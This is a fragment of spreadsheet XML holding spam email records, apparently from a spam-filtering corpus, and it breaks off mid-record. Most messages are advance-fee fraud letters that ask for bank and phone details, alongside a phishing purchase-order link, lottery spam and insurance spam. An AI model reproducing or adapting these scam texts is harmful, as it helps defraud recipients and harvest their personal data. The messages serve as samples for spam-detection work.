    <t>CONFIDENTIAL PROPOSAL FROM.\nMR.MUHAMMD  AMIN\nTHE CHIEF AUDITOR INCHARGE,\nAFRICAN DEVELOPMENT BANK (ADB).\nOUAGADOUGOU BURKINA FASO.\nWEST AFRICA.\n\nMy Good Friend,\n\nHow are you doing together with your family? I guessed all is well. My \nmassage should not be a surprise proposal to you because i got your contact \ninformation from the international directory in few weeks ago  before i \ndecided to contact you on this magnitude and lucrative transaction for our \nfuture survival in life.\n\nMoreover, i have laid all the solemn trust in you before i decided to \ndisclose this successful &amp; confidential transaction to you.\n\nAs i have said, I AM MR. MUHAMMD  AMIN. THE CHIEF AUDITOR INCHARGE OF \nFOREIGN REMITTANCE UNIT, AFRICAN DEVELOPMENT BANK OUAGADOUDOU BURKINA-FASO.\nNow i have the intent to contact you over this financial transaction worth \nthe sum of NINTEEN MILLION, THREE HUNDRED THOUSAND UNITED STATES DOLLARS \n($19,300,000.00 ) for our future success.\n\nThis is and abandoned sum that belongs to one of our bank foreign customers \nwho died along with his entire family through plane crash disaster since few \nyears ago. Meanwhile i was very fortune to came across the deceased file \nwhen i was arranging the old and abandoned customers files in other to sign \nand submit to the entire bank management for an official re-documentation \nand audit of the year against 2008.\n\nBe informed clearly that it was stated in our banking rules and regulations \nwhich was signed lawfully that if such fund remains unclaimed  till the \nperiod of 6 years started  from the date when the beneficiary died, the \nmoney will be transferred into the treasury as an unclaimed fund.\n\nAs a honour and advantage bestowed to our foreign customers base on the \nrules guilding our bank, it was stated obviously that if you are not a \ncitizen of Burkina Faso , you have the absolute authority to claim the fund \nhence you are a foreigner despite your differences from the country of \norigin of the deceased.\n\nSo the request of you as a foreigner is necessary and legit to apply for the \nclaim and transfer of the fund smoothly into your reliable bank account as \nthe NEXT OF KIN OR EXTENDED RELATIVE to the deceased costomer.\n\nOn the transfer of this fund into your account, { 39% } being ( \nUS$7,527,000.00) will be your share in respect of the account provision and \nyour assistance rendered during the transfer of the fund into your bank \naccount,{ 52% } being (US$10,036,000.00) will be my share being the \ncodinator and the pillar of the transaction while the rest { 9% } being \n(US$1,737,000.00) will be shared to the respectable Organisations Centers \nsuch as Charity Organisation, Motherless Babies homes, and helpless disabled \npeople in the World.\n\nNow, if you are really sure of your trustworthy, \naccountability,confidentiality on this transaction, contact me and agree \nthat you will not change your mind to cheat or disappoint me  when the fund \nhave getting into your account. Besides you should not entertain any fear \nbecause i am sure of the success as an insider in the bank.\n\nPlease reply with the assurance, include your private telephone and fax \nnumbers necessary for facilitate an easy communication in this transaction.\n\nAs soon as you reply , give me a call through my private telephone number on \n( 00 226 70437906 ) so that i will let you know the next step to follow in \norder to finalize this transaction immediately.\n\nI expect your urgent communication and my best regard to you and all members \nof your family.\nMr_muhammd_amin@yahoo.fr\nYours sincerely,\n\nmr. MUHAMMD   AMIN\n\n_________________________________________________________________\nWindows Live Spaces : crez votre blog  votre image ! \n[URL]http://www.windowslive.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.windowslive.fr</t>
  </si>
  <si>
    <t>2796</t>
  </si>
  <si>
    <t>To: kenozed@yahoo.com\nFrom: DAVID   ROBERTS [BARCLAYS BANK]. &lt;consultant@urchumunwa.com&gt;\nDate: Thu, 14 Dec 2006 18:16:44 -0500</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2006 18:16:44 -0500</t>
  </si>
  <si>
    <t>DAVID   ROBERTS [BARCLAYS BANK]. &lt;consultant@urchumunwa.com&gt;</t>
  </si>
  <si>
    <t>kenozed@yahoo.com</t>
  </si>
  <si>
    <t>Attention: Your   Inheritance  Fund [Reply Urgently].</t>
  </si>
  <si>
    <t>&gt;From The Desk: Of David Roberts, \nExecutive Director,                        \nInternational Remittance/Foreign Operations.\nBarclays Bank PLC.\n# 1 Churchill Place,\nLondon  E14  5HP, United Kingdom\nDirect Line + 44-704-570-0413. \n\nEmail:david_r_barclays@yahoo.co.uk\n\n[URL]http://www.barclays.co.uk[/URL]\n\n[URL]http://www.newsroom.barclays.co.uk[/URL]\n\n\n Attention:\n                              Your   Inheritance  Fund\n \nThis is to notify you that your inheritance fund valid US$10.500,000.00(Ten\nMillion Five Hundred Thousand dollars only) has been gazzeted to be released\ninto your nominated bank account details through telegraphic telex transfer\n(KTT) by the office of International Remittance Department / Foreign\nDepartment,\n \nMeanwhile, a woman forwarded a letter of claims to our office few days ago,she\nstated that from now henceforth she is your legal representative in connection\nwith your fund, below are her information:\n \nName: Janet White\nBank Name: Citi Bank\nBank Address:Texas, U.S.A.\nAccount Number: 6503809428.\n \nWe contacted you for your authorisation,are we to effect the payment of this\nfund into the account details provided by Mrs. White ?,please do reconfirm to\nour office as a matter of urgency if we are to effect the swift transfer.\nBecause our Bank  will  be held responsible for any wrong transfer.\n \nIf Mrs. janet White is not your representative, you are requested to reconfirm\nyour nominated account details, valid house address and tel / fax no and where\nyou want this fund transfered into,as soon as we recieve the details, your\nfund will be transfered to you with immediatel effect.\n\n Be informed that we have been given a mandate of fourteen official working \ndays by the concerned Authorities  to remmit this fund, For more information\ncall:\n+ 44-704-570-0413 \n\nWe await your urgent respons to this mail: david_r_barclays@yahoo.co.uk \n  \n    \nYOURS SINCERELY, \n\nMr. David Roberts. \nInternational Remittance Department/\nForeign Operations.\nBarclays Bank UK  Plc.\n \nCc:International Monetary Fund [IMF],\n\nCc:Board of Directors [B B PLC].\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.barclays.co.uk http://www.newsroom.barclays.co.uk</t>
  </si>
  <si>
    <t>695</t>
  </si>
  <si>
    <t>To: fmlucy112@netscape.net\nFrom: fmlucy112@netscape.net\nDate: Thu, 13 May 2004 15:24:18 +0200</t>
  </si>
  <si>
    <t>Thu, 13 May 2004 15:24:18 +0200</t>
  </si>
  <si>
    <t>fmlucy112@netscape.net</t>
  </si>
  <si>
    <t xml:space="preserve">RE: +++PLEASE WE NEED YOUR HELP US$32.5 MILLION !!!!!  </t>
  </si>
  <si>
    <t>\n FROM:MRS.MCKNIGHT LUCY,\n\nTHE WIFE OF LATE CHIEF FREDRICK MCKNIGHT,\n\nFORMER POPULAR BLACK FARMER IN ZIMBABWE.\n\n\nDear Friend.\n\nWith due respect, trust and humility I write this\nLetter to you seeking your help and assistance though\nIts difficult since we have not met before. \n\nI got your good contact from the Zimbabwean\nInformation Exchange(ZIE) regarding your business\nprofile and Sincerity, I believe that you are capable\nand reliable in assisting this my urgent request. I am\nMrs. BUSISIWE LUCY MCKNIGHT, the wife of LATE FREDRICK\nMCKNIGHT, the former popular black farmer in Zimbabwe\nwho is also a Famous politician, in the Zimbabwe\npolitical arena. My husband was assonated by president\nMugabe and his men because he (my husband)refusal to\nagree with the so called president to take the lands/farms \nof the whites who contribute to make the country what it is today.\nBecause of my husbands sincerity he was constantly briefing the press \non what is going wrong in the country and the autocratic government of\nMugabe.He was assassinated on 23 November 2001 being Sunday by 8.45 in Harare, \nin Western  province of Zimbabwe, the planners of the assassination are well\nknow by the masses. \n\nMy dear when this incident occurred at about 8.45 in Zimbabwe time, my husband \ndid not die on the spotrather he was rushed to Harare hospital where he later died. \nBefore the death of my husband, he had taken me and our son to South Africa to \ndeposit the sum of US$32.5 million {Thirty two million five hundred thousand dollars} in a\nsecurity company . And now I am in Zimbabwe but my son is in South Africa \nwith the money deposited in asecurity company with the documents intact. Because of\nthe country existing law, which bears asylum seekers/refugee like him \n(my son) and also hisage not to operate an account that exceed US$2000.00\nand the fear of the South African government not raising  eyebrows about the\nmoney therein South Africa, I decided to write to you seek for your help \nfor this money tobe transferred into your private bank account as all\narrangements for a hitch free transfer have been fully taken care off.\nAnd also due to my presentcondition here in Zimbabwe, Mugabe and his allied have\nderide me the right of traveling outside the country, I am having a deadly \ncancer ofthe breast which make me to be worried to see that\nthis money is in a safe hand before anything happened to me, it is the \nonly thing left for the upbringing of my children whom are still young before my\nhusband left me. I want to assure you also that this \ntransaction is 100% risk free as no other person knows this \napart from my first Son Samuel and I. Dear, as for your rewarding kind \nassistance I have resolved to give you 20% of the total amount, while 5% have \nbeen mapped out for any expenses that might be incurred in the course of this\ntransaction. We planned to invest the rest of the money in your country under \nyour guidance.If you are willing to assist us try as much as possible to write \nme so I also inform my son about my negotiations with you.\n\nDear, bear in mind that our lives and future of my\nchildren depend on this fund and we do hope that this\nmoney will be safe, when finally transferred into your account. I do hope of \nestablishing a rewarding and good relationship with you and your\nfamily after this transaction. Hoping to hear from you as soon as possible. \nPlease I would likeyou to keep this transaction highly confidential and secret \nconsidering my sons position in South Africa. I have already brief my son \nimmediately you,if  you  receive this mail kindly contact him.\n\nThis is his phone number +27-835266638,I am waiting to\nhear from you soon.\n\n\n\nThanks for your understanding and God bless you.\n\nBest regards,\n\nMRS. LUCY MCKNIGHT.\n\nPLEASE YOU CAN READ ABOUT PROBLEMS IN ZIMBABWE FROM \nTHE LINKS BELOW. \n[URL]http://www.1freespace.com[/URL] \n[URL]http://news.bbc.co.uk[/URL] \n[URL]http://news.bbc.co.uk[/URL] \n[URL]http://news.bbc.co.uk[/URL]\n[URL]http://www.gta.gov.zw[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.1freespace.com http://news.bbc.co.uk http://news.bbc.co.uk http://news.bbc.co.uk http://www.gta.gov.zw</t>
  </si>
  <si>
    <t>625</t>
  </si>
  <si>
    <t>To: nan\nFrom: "Alibaba"&lt;gregh@ceagroup.com.au&gt;\nDate: Thu, 13 Jul 2017 19:18:26 +0100</t>
  </si>
  <si>
    <t>Thu, 13 Jul 2017 19:18:26 +0100</t>
  </si>
  <si>
    <t>"Alibaba"&lt;gregh@ceagroup.com.au&gt;</t>
  </si>
  <si>
    <t>Urgent Purchase Order!!!</t>
  </si>
  <si>
    <t>This is HTML source of message you composed. Do not modify here. To modify this message press HTML Messages Editor button.   Dear sir,       SECOND URGENT REMINDER       We where referred to your company by one of your customers.   Please click the link [URL]http://gied247.com[/URL] for Purchase Order for this materials pattern and arrange to send the material to us.       We would like to visit your company for further discussion. Due to urgency of our order please kindly find the attached purchase order and send in your proforma invoice for production and shipment asap.   Quantity received excess to purchase order will not be acceptable,        Please be note..   See click link now [URL]http://gied247.com[/URL] and give us your best offer ASAP.       I wait for your quick reply..   Thanks &amp; Regards,   Jane Mendes   Manager Customer Experience     Hand Phone : +34 91673 95290   info@noora.org   Qi Spine Clinic               Spine Specialist in Delhi, Mumbai,Pune and Bangalore - QiSpine   Qi Spine Clinic offers advanced treatment for spinal disorders by the best spine orthopedic specialist in Mumbai...           This email and any files transmitted with it are confidential and intended  solely for the use of the individual or entity to whom they are addressed. If you have received this email in error, please notify the sender immediately by email or delete this email from your system. If you are not the intended recipient, you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited. The opinion expressed in this mail is that of the sender and does not necessarily reflect that of Qi Lifecare.   WARNING: Despite best possible precautionary measures taken by Qi Lifecare, computer viruses can be transmitted via email. The recipient should check and scan this email and any attachments for the presence of viruses. Qi Lifecare accepts no liability for any damage caused by any virus transmitted by this email.   ****************************************************************************************************************     ---------------------------------------------------------------------------------------------------------------------------The                            information in this e-mail is confidential and may be                            legally privileged. It is intended solely for the addressee.                            If you are not the intended recipient please delete                            and do not disclose to another person or use, copy or                            forward all or any of it in any form.If the email has come to you by mistake please delete it. ----------------------------------------------------------------------</t>
  </si>
  <si>
    <t>http://gied247.com http://gied247.com</t>
  </si>
  <si>
    <t>2340</t>
  </si>
  <si>
    <t>To: mrcliveosborn@netscape.net &lt;R@M&gt;\nFrom: Larisa Sosnitskaya &lt;mrcliveosborne@netscape.net&gt;\nDate: Thu, 13 Jul 2006 22:42:26 -0300</t>
  </si>
  <si>
    <t>Thu, 13 Jul 2006 22:42:26 -0300</t>
  </si>
  <si>
    <t>Larisa Sosnitskaya &lt;mrcliveosborne@netscape.net&gt;</t>
  </si>
  <si>
    <t>mrcliveosborn@netscape.net &lt;R@M&gt;</t>
  </si>
  <si>
    <t>INVESTMENT PROPOSAL</t>
  </si>
  <si>
    <t>Dear Friend,\n \nI am Larisa Sosnitskaya and I represent Mr. Mikhail Khordokovsky the former\nC.E.O of Yukos Oil Company in Russia.\n \nI have a very sensitive and confidential brief from this top (oligarch) to\nask for your partnership in re-profiling funds US$46 Million. I will give\nthe details, but in summary, the funds are coming via Bank Menatep. This is\na legitimate transaction.\n \nYou will be paid 20% as your commission/compensation for your active\nefforts and contributions to the success of this transaction.\n \nYou can catch more of the story on this website below or you can watch more\nof CCN or BBC to get more news about my boss.\n \n[URL]http://www.mosnews.com[/URL]\n[URL]http://www.mbktrial.com[/URL]\n[URL]http://news.bbc.co.uk[/URL]\n[URL]http://www.themoscowtimes.com[/URL]\n[URL]http://www.nndb.com[/URL]\n \nIf you are interested, please do indicate by providing me with your\nconfidential telephone number, fax number and email address and I will\nprovide further details and instructions. \nPlease keep this confidential as we cannot afford more political problems.\nPlease do send me your response as soon as possible via my personal email:\nmrcliveosborn@netscape.net\n \nlooking  forward to hearing from you.\n \nRegards,\nLarisa Sosnitskaya.\n\n\n\n\n</t>
  </si>
  <si>
    <t>1989</t>
  </si>
  <si>
    <t>To: R@S\nFrom: kingnnaji3 nnaji &lt;kingnnaji3@yahoo.com.cn&gt;\nDate: Thu, 13 Apr 2006 03:04:48 +0800</t>
  </si>
  <si>
    <t>Thu, 13 Apr 2006 03:04:48 +0800</t>
  </si>
  <si>
    <t>kingnnaji3 nnaji &lt;kingnnaji3@yahoo.com.cn&gt;</t>
  </si>
  <si>
    <t>我有一个新的电邮地址了！您现在可以发电子邮件给我到：kingnnaji3@yahoo.com.cn\n\nFROM MR CHARLES ZUMA\n\nDIRECTOR OF FINANCE\n\nAUDITING AND ACCOUNTING UNIT,\n\nBANK OF AFRICA,\n\nCOTONOU-BENIN REPBLIC.\n\nE-MAIL BOX:barrcharleszuma1@yahoo.ca\n\n\n\nMy name is Mr.JAMES BROWN. I am the credit AUDITING AND ACCOUNTING\n\nUNIT,BANK OF AFRICA,COTONOU-BENIN REPBLIC. I am contacting you of a business\n\n\ntransfer, of a huge sum of money from a deceased account. Though I know\n\nthat a transaction of this magnitude will make any one apprehensive and\n\nworried, but I am assuring you that everything has been taken care off,\n\nand all will be well at the end of the day. I decided to contact you\n\ndue to the urgency of this transaction.\n\nPROPOSITION; I am the account officer  of a foreigner named Gerald Welsh\n\nwho died in an air crash along with his wife on the 31st October 1999\n\nin an Egyptian airline 990 with other passengers on board. You can\n\nconfirm this from the website below which was published by BBC WORLD\n\nNEWS.\n\n\nWEBSITE. [URL]http://news.bbc.co.uk[/URL] Since his\n\ndeath, none of his next-of-kin are alive to make claims for this money\n\nas his heir, because they all died in the same accident himself and his\n\nwife(May their soul rest in peace). We cannot release the fund from his\n\naccount unless someone applies for claim as the next-of-kin to the\n\ndeceased as indicated in our banking guidelines.\n\n\nUpon this discovery, I now seek your permission to have you stand as a\n\nnext of kin to the deceased, as all documentations will be carefully\n\nworked out by me for the funds (USD 10,700,000.00) to be released in\n\nyour favor as the beneficiary's next of kin. Because after four years the\n\nmoney will be called back to the bank treasury as unclaimed bills and\n\nthe money shared amongst the directors of the bank. \n\n\nso it is on this note i decided to seek for whom his name shall be used as the next of kin/beneficiary to this funds rather than allow the bank directors to\n\nshare this money amongst themselves at the end of the year.\n\nIt may interest you to know that we have secured from the probate an\n\norder of mandamus to locate any of the deceased beneficiaries. Please\n\nacknowledge receipt of this message in acceptance of our mutual\n\nbusiness endeavor by furnishing me with the following information if you are\n\ninterested.\n\n\n1.A Beneficiary name. In order for me to prepare the document for\n\ntransfer of the funds in your name. 2. Direct Telephone and fax\n\nnumbers. For  our personal contact and mutual trust in each other.\n\nI shall be compensating you with [3million Million Dollars)\n\non final conclusion of this project for your assistance, while the\n\nbalance of 5 Million Dollars shall be for me for investment purposes.\n\nBecause I intend to retire after the conclusion of this transaction.\n\nIf this proposal is acceptable by you, please endeavor to contact me\n\nimmediately. Do not take undue advantage of the trust I have bestowed\n\nin you, I await your urgent reply. to this address: barrcharleszuma1@yahoo.ca  \n\nRegards,\n\nCHARLES ZUMA \n\n- kingnnaji3 nnaji\n\n</t>
  </si>
  <si>
    <t>1988</t>
  </si>
  <si>
    <t>To: R@M\nFrom: kingnnaji3 nnaji &lt;kingnnaji3@yahoo.com.cn&gt;\nDate: Thu, 13 Apr 2006 03:04:48 +0800</t>
  </si>
  <si>
    <t>一碌牡实址耍诳苑始业kingnnaji3@yahoo.com.cn\n\nFROM MR CHARLES ZUMA\n\nDIRECTOR OF FINANCE\n\nAUDITING AND ACCOUNTING UNIT,\n\nBANK OF AFRICA,\n\nCOTONOU-BENIN REPBLIC.\n\nE-MAIL BOX:barrcharleszuma1@yahoo.ca\n\n\n\nMy name is Mr.JAMES BROWN. I am the credit AUDITING AND ACCOUNTING\n\nUNIT,BANK OF AFRICA,COTONOU-BENIN REPBLIC. I am contacting you of a business\n\n\ntransfer, of a huge sum of money from a deceased account. Though I know\n\nthat a transaction of this magnitude will make any one apprehensive and\n\nworried, but I am assuring you that everything has been taken care off,\n\nand all will be well at the end of the day. I decided to contact you\n\ndue to the urgency of this transaction.\n\nPROPOSITION; I am the account officer  of a foreigner named Gerald Welsh\n\nwho died in an air crash along with his wife on the 31st October 1999\n\nin an Egyptian airline 990 with other passengers on board. You can\n\nconfirm this from the website below which was published by BBC WORLD\n\nNEWS.\n\n\nWEBSITE. [URL]http://news.bbc.co.uk[/URL] Since his\n\ndeath, none of his next-of-kin are alive to make claims for this money\n\nas his heir, because they all died in the same accident himself and his\n\nwife(May their soul rest in peace). We cannot release the fund from his\n\naccount unless someone applies for claim as the next-of-kin to the\n\ndeceased as indicated in our banking guidelines.\n\n\nUpon this discovery, I now seek your permission to have you stand as a\n\nnext of kin to the deceased, as all documentations will be carefully\n\nworked out by me for the funds (USD 10,700,000.00) to be released in\n\nyour favor as the beneficiary's next of kin. Because after four years the\n\nmoney will be called back to the bank treasury as unclaimed bills and\n\nthe money shared amongst the directors of the bank. \n\n\nso it is on this note i decided to seek for whom his name shall be used as the next of kin/beneficiary to this funds rather than allow the bank directors to\n\nshare this money amongst themselves at the end of the year.\n\nIt may interest you to know that we have secured from the probate an\n\norder of mandamus to locate any of the deceased beneficiaries. Please\n\nacknowledge receipt of this message in acceptance of our mutual\n\nbusiness endeavor by furnishing me with the following information if you are\n\ninterested.\n\n\n1.A Beneficiary name. In order for me to prepare the document for\n\ntransfer of the funds in your name. 2. Direct Telephone and fax\n\nnumbers. For  our personal contact and mutual trust in each other.\n\nI shall be compensating you with [3million Million Dollars)\n\non final conclusion of this project for your assistance, while the\n\nbalance of 5 Million Dollars shall be for me for investment purposes.\n\nBecause I intend to retire after the conclusion of this transaction.\n\nIf this proposal is acceptable by you, please endeavor to contact me\n\nimmediately. Do not take undue advantage of the trust I have bestowed\n\nin you, I await your urgent reply. to this address: barrcharleszuma1@yahoo.ca  \n\nRegards,\n\nCHARLES ZUMA \n\n- kingnnaji3 nnaji\n\n</t>
  </si>
  <si>
    <t>1987</t>
  </si>
  <si>
    <t>To: aiweb06@cs.umbc.edu\nFrom: Henry Carr &lt;henrycarr20@yahoo.com.cn&gt;\nDate: Thu, 13 Apr 2006 01:29:49 +0800</t>
  </si>
  <si>
    <t>Thu, 13 Apr 2006 01:29:49 +0800</t>
  </si>
  <si>
    <t>Henry Carr &lt;henrycarr20@yahoo.com.cn&gt;</t>
  </si>
  <si>
    <t>Dear Sir/Ma,</t>
  </si>
  <si>
    <t>我有一个新的电邮地址了！您现在可以发电子邮件给我到：henrycarr20@yahoo.com.cn\n\nCONFIDENTIALITY NOTICE: \n\n \n\nThis e-mail message is from Mr.Henry Carr .This message is for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any review,use,distribution or disclosure by others is strictly prohibited.If you are not the intended recipient (or authorized to receive for the recipient),please contact the sender by reply email and delete all copies of this message. \n\n \n\nGreetings to you,\n\n \n\nThis letter must come to you as a big surprise, but I believe it is only a day that people meet and become great friends and business partners.My name is Mr.Henry Carr, the present branch Manager of a bank here in Nigeria West Africa. I write you this proposal in good faith, believing that I can trust you with the information I am about to reveal to you. LikeI said, I have a transaction that will benefit both of us, as your assistance is required as a foreigner.\n\n \n\nI use to head the Accounts department in my bank head office, but last December I was asked to take position of a Manager of our branch in Lagos who passed on,so that was how I became the present Manager and discovered a fortune. As I resumed duty, I discovered an account with total sum of $10.5 million that has not been operated on for the past 4 years.From my investigation,I found out that this account belongs to one Late Mr. Ziya Bazhayev a Russian big time Oildealer, who unfortunately lost his life in the Yak-40jetliner on March 9, 2000. You will read more news about the crash on visiting these site; \n\n[URL]http://www.amarillonet.com[/URL] and\n\n[URL]http://news.1chinastar.com[/URL]\n\n \n\nI have kept a close monitoring of the account since then and nobody has come forward to claim the  money as next of kin to the late Mr. Ziya Bazhayev meaning that no one is aware of the account. I can not directly take out this money without the help of a foreigner and that is why I am contacting you for an assistance to claim the funds and share it with me. As the Manager of my bank branch, I have the power to influence the release of the funds to any foreigner that comes up as the next of kin to the account, with the correct information concerning the account, which I shall give you.I am seeking your co -operation to present you as the next of kin to the account. There is practically no risk involved, the transaction will be executed under a legitimate arrangement that will protect you from any breach of law.If you accept to work with me, I want you to state how you wish us to share the funds in percentage, so that both parties will be satisfied. Contact me as soon as you receive this message if you feel we can work together,so as to give you more details.\n\nThanking you in advance and may God bless you.\n\n \n\nPlease, treat with utmost confidentiality.\n\n \n\nI wait your urgent response.\n\n\nRegards,\n\n\nMr.Henry Carr\n\n\n\n- Henry Carr\n\n</t>
  </si>
  <si>
    <t>http://www.amarillonet.com http://news.1chinastar.com</t>
  </si>
  <si>
    <t>4360</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "IQ - TBA" &lt;tba@insiq.us&gt;\nDate: Thu, 12 Sep 2002 19:19:51 -0400</t>
  </si>
  <si>
    <t>Thu, 12 Sep 2002 19:19:51 -0400</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_143B1F_01C25A7A.A80CB430 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: quoted-printable  The TBA Doctor Walks the Walk... On Diabetes!  =20  =20 Case 1:	 Case 2:	=20 ? Male age 37 ? Nonsmoker=20 ? $500,000 Face ? Type 1 Diabetic - Treated with Insulin Pump ? Diagnosed at age 23 ? Hospitalized in '95, '96 and '98 with   "Diabetic Complications" ? Issued Standard 	? Male age 51 ? Nonsmoker=20 ? $1,200,000 Face ? 6'0", 237lbs=20 ? Takes Micronase and Glucophage ? Issued Super Standard =09 Case 3:	 Case 4:	=20 ? Female age 60 ? Nonsmoker=20 ? $2,000,000 Face ? 5'5", 165lbs=20 ? Insulin Dependent=20 ? Issued Super Standard 	? Male age 45 ? Nonsmoker=20 ? $875,000 Face ? 6'4", 275lbs ? Diabetes Controlled by Diet ? Issued Super Standard =09 Click here to provide the details on your "tough case"  	=20 Call the Doctor with your case details! We've cured 1,000s of agents' "tough cases!"  800-624-4502 ext. 18=09 =97 or =97 Please fill out the form below for more information	=20 Name:	 	  =09 E-mail:	 	=20 Phone:	 	=20 City:	 	 State:	 	=20  	    =09 =20 Tennessee Brokerage Agency - [URL]www.TBA.com[/URL]  =20 We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.InsuranceIQ.com[/URL] Legal Notice  =20 ------=_NextPart_000_143B1F_01C25A7A.A80CB430 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable The TBA Doctor Walks the Walk on Diabetes =20      =20        =20            =20              =20                 Case 1: Case 2: =20                 • Male age = 37                   • Nonsmoker                    • $500,000 Face                   • Type 1 Diabetic - Treated with Insulin = Pump                   • Diagnosed at age 23                   • Hospitalized in '95, '96 and '98 with                     "Diabetic Complications"                   • Issued = Standard • Male age 51                   • Nonsmoker                    • $1,200,000 Face                   • 6'0", 237lbs                    • Takes Micronase and Glucophage                   • Issued Super = Standard =20                 Case = 3: Case = 4: =20                 • Female = age 60                   • Nonsmoker                    • $2,000,000 Face                   • 5'5", 165lbs                    • Insulin Dependent                    • Issued Super = Standard • Male age = 45                   • Nonsmoker                    • $875,000 Face                   • 6'4", 275lbs                   • Diabetes Controlled by Diet                   • Issued Super = Standard =20            =20           =20             Call the Doctor with = your case details! We've cured 1,000s of agents' = "tough cases!" — or = — =20 								 =20 										 =20                         Please fill = out the form below for more information =20                         Name:   =20                         E-mail:   =20                         Phone:   =20                         City:   State:   =20                           =20                            =20                          =20            =20      =20         We don't want anyone to receive our mailings who does not wish = to. This=20         is professional communication sent to insurance professionals. = To be removed=20         from this mailing list, DO NOT REPLY to this message. = Instead,=20         go here: [URL]http://www.InsuranceIQ.com[/URL] out Legal Notice=20 =20 ------=_NextPart_000_143B1F_01C25A7A.A80CB430--</t>
  </si>
  <si>
    <t>4347</t>
  </si>
  <si>
    <t>To: Spamassassin-talk@example.sourceforge.net\nFrom: "CAPT. JOHN OKELE" &lt;johnokele@truthmail.com&gt;\nDate: Thu, 12 Sep 2002 13:44:13 -0700</t>
  </si>
  <si>
    <t>Thu, 12 Sep 2002 13:44:13 -0700</t>
  </si>
  <si>
    <t>"CAPT. JOHN OKELE" &lt;johnokele@truthmail.com&gt;</t>
  </si>
  <si>
    <t>[SAtalk] **urgent assistance**</t>
  </si>
  <si>
    <t>5, Meridian East\nLeicester LE3 2WZ \nLeicester City, \nUnited Kingdom\nTel/Fax: 44-870-136-7079\n\nDate: 09/11/2002 \n\nFROM: CAPT JOHN OKELE \n\nDEAR SIR, \n\nI got your contact through a Military friend who I did training with in your country, I am Captain JOHN OKELE the former Commander of the Security Guards of the late Laurent Kabila (former President, Democratic Republic of Congo (Africa), I am presently in self-exile with my wife and one child in remote Leicester City Britain, due to threat of the present Government headed by the son of Late Laurent Kabila after my life and my family to kill, saying that I know about the death of his father.\n\n\nI assisted Late President Laurent Kabila to keep US$35M (Thirty Five Millions) in a Security company during the War in My Country.  \n\nAlthough the security company does not know the content in the boxes deposited as we deposit it as personal effects of Mr. Laurent Kabila. It is in this respect that I seek your help to assist me in the investment of these funds before the present Government headed by the son will have knowledge of this money to avoid being taking away. \n\nOn conclusion of this business, I shall compensate you with 45% of the fund, while 5% is mapped out for any expense we should encounter during the cause of transaction, and the remaining amount should be used to open account for my family for investment over there with your assistance. \n\nI need a profitable long-term investment plan with your company or you. Your terms, suggestions and ideas are required urgently. \n\nExpecting your prompt response. Also furnish me with your current E-mail address, Tel/Fax Numbers (Private) for a personal contact with you. \n\nNOTE: Please you can call or fax to the line above, it belong to my cousin, as he know the confidentiality, you can reach me direct on my mail above.  \n\nYours Faithfully,\nCapt JOHN OKELE\nE-mail: johnokele2@hotmail.com\nPrivate E-mail: johnokele@london.com\n\n\n\n\n-------------------------------------------------------\nIn remembrance\n[URL]www.osdn.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>4358</t>
  </si>
  <si>
    <t>To: root@zzzzason.org\nFrom: "Powerball Lottery" &lt;powerballinfo@powerballinfo.cjb.net&gt;\nDate: Thu, 12 Sep 2002 10:32:03 -0500</t>
  </si>
  <si>
    <t>Thu, 12 Sep 2002 10:32:03 -0500</t>
  </si>
  <si>
    <t>"Powerball Lottery" &lt;powerballinfo@powerballinfo.cjb.net&gt;</t>
  </si>
  <si>
    <t>root@zzzzason.org</t>
  </si>
  <si>
    <t>Powerball Results Saturday September 14, 2002 Estimated Jackpot $100 Million</t>
  </si>
  <si>
    <t>Would you like to know what the Powerball Winning Lottery Numbers will be in the Morning, If so Just Follow This link mailto:results.cresenttechnologies.com\n\nAlthough every attempt is made to ensure that this list of numbers is accurate, the official winning numbers are recorded in the official draw files as certified by the independent accounting firm. At the request of our players, these numbers are listed in numerical order. \nWednesday September 11, 2002 Draw Results:\n03 06 26 39 48 PB 28 PP 03 Or Visit [URL]http://www.powerballinfo.cjb.net[/URL]\n\n\nAre you tired of your job?\n\nThen Please Visit [URL]http://www.cash-in.cjb.net[/URL]  It's Time to Retire!!</t>
  </si>
  <si>
    <t>http://www.powerballinfo.cjb.net http://www.cash-in.cjb.net</t>
  </si>
  <si>
    <t>2591</t>
  </si>
  <si>
    <t>To: nan\nFrom: James Williams &lt;jawilliams001@hotmail.com&gt;\nDate: Thu, 12 Oct 2006 13:32:22 -0400</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2006 13:32:22 -0400</t>
  </si>
  <si>
    <t>James Williams &lt;jawilliams001@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">URGENT RESPONSE FOR BUSINESS TRANSACTION. </t>
  </si>
  <si>
